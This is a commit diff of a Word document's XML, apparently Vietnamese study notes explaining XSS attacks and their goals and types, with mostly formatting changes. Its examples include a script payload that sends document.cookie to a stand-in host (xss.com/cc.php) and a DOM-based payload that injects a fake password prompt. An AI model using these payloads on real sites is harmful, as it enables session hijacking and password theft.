<commit_message>
Bản update XSS cript
</commit_message>
<xml_diff>
--- a/XSS script.docx
+++ b/XSS script.docx
@@ -4,20 +4,83 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>1)</w:t>
-      </w:r>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>TÌM HIỂU VỀ LỖI BẢO MẬT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>XSS SCRIPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tổng quan về lỗi bảo mật XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> script</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -29,6 +92,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -46,20 +110,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>2)</w:t>
-      </w:r>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -71,6 +132,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -112,6 +174,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -137,6 +200,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -154,6 +218,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -171,59 +236,122 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>3)Mục đích của tấn công XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Mục đích của tấn công XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>Phụ thuộc vào mục đích của hacker những đoạn Javascript được chèn vào để lấy những thông tin sau:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
+        <w:ind w:left="1440" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>-cookie : hacker có thể lấy được cookie của người dùng và dùng thông tin trong cookie để giả mạo phiên truy cập.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1440" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>-keylogging : hacker có thể ghi lại những thao tác gõ phím của người dùng bắng cách sử dụng sự kiện addEventListenner trong  javascript sau đó gửi lại cho chúng để tìm hiểu về mật khẩu hay mã số thẻ tín dụng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1440" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>-phishing: hacker có thể thay đổi giao diện website bằng cách thay đổi cấu trúc HTML trong trang web để đánh lừa người dùng,khi đó chúng có thể tạo các forrm đăng nhập giả để lấy mật khẩu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các kiểu tấn công XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -237,59 +365,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>-keylogging : hacker có thể ghi lại những thao tác gõ phím của người dùng bắng cách sử dụng sự kiện addEventListenner trong  javascript sau đó gửi lại cho chúng để tìm hiểu về mật khẩu hay mã số thẻ tín dụng.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>-phishing: hacker có thể thay đổi giao diện website bằng cách thay đổi cấu trúc HTML trong trang web để đánh lừa người dùng,khi đó chúng có thể tạo các forrm đăng nhập giả để lấy mật khẩu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>4)Các kiểu tấn công XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>C</w:t>
       </w:r>
       <w:r>
@@ -303,18 +378,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Kiểu t</w:t>
       </w:r>
       <w:r>
@@ -344,24 +425,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:ind w:left="360" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve">Ví dụ: </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -404,6 +486,7 @@
     <w:tbl>
       <w:tblPr>
         <w:tblW w:w="7710" w:type="dxa"/>
+        <w:tblInd w:w="1080" w:type="dxa"/>
         <w:tblCellMar>
           <w:left w:w="0" w:type="dxa"/>
           <w:right w:w="0" w:type="dxa"/>
@@ -435,7 +518,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="7290" w:type="dxa"/>
+            <w:tcW w:w="7600" w:type="dxa"/>
             <w:vAlign w:val="center"/>
             <w:hideMark/>
           </w:tcPr>
@@ -481,7 +564,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="7290" w:type="dxa"/>
+            <w:tcW w:w="7600" w:type="dxa"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -500,6 +583,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -517,6 +601,11 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -534,6 +623,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -551,6 +641,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -575,9 +666,12 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> 'http://www.xss.com/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -587,11 +681,8 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t>'http://www.xss.com/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -601,7 +692,8 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>&lt;script&gt;location.href='http://www.xss.com/cc.php?c</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -612,7 +704,7 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t>&lt;script&gt;location.href='http://www.xss.com/cc.php?c</w:t>
+        <w:t>ookie='+document.cookie;&lt;/scrip</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -624,9 +716,12 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t>ookie='+document.cookie;&lt;/scrip</w:t>
-      </w:r>
-      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -636,24 +731,11 @@
           <w:szCs w:val="26"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
         </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F2F6F8"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -671,6 +753,11 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -685,9 +772,12 @@
         </w:rPr>
         <w:t xml:space="preserve">Kiểu thứ 3: Dom-based XSS </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -705,6 +795,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -723,6 +814,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="333333"/>
@@ -738,7 +830,17 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:br/>
-        <w:t>&lt;script&gt;document.getElementById('hello').innerHTML="&lt;label&gt;Vui lòng xác nhận lại mật khẩu để tiếp tục: &lt;/label&gt;&lt;input</w:t>
+        <w:t xml:space="preserve">&lt;script&gt;document.getElementById('hello').innerHTML="&lt;label&gt;Vui lòng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>xác nhận lại mật khẩu để tiếp tục: &lt;/label&gt;&lt;input</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -779,6 +881,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -792,6 +895,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:iCs/>
@@ -804,6 +908,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -820,21 +925,12 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">Thì nó sẽ hiển a một trang nền trang cũ nhưng lại là trang để lấy mật khẩu của người </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>dùng.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>Thì nó sẽ hiển a một trang nền trang cũ nhưng lại là trang để lấy mật khẩu của người dùng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1080"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:iCs/>
@@ -847,6 +943,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -888,6 +985,189 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="2FA51309"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="200CD650"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
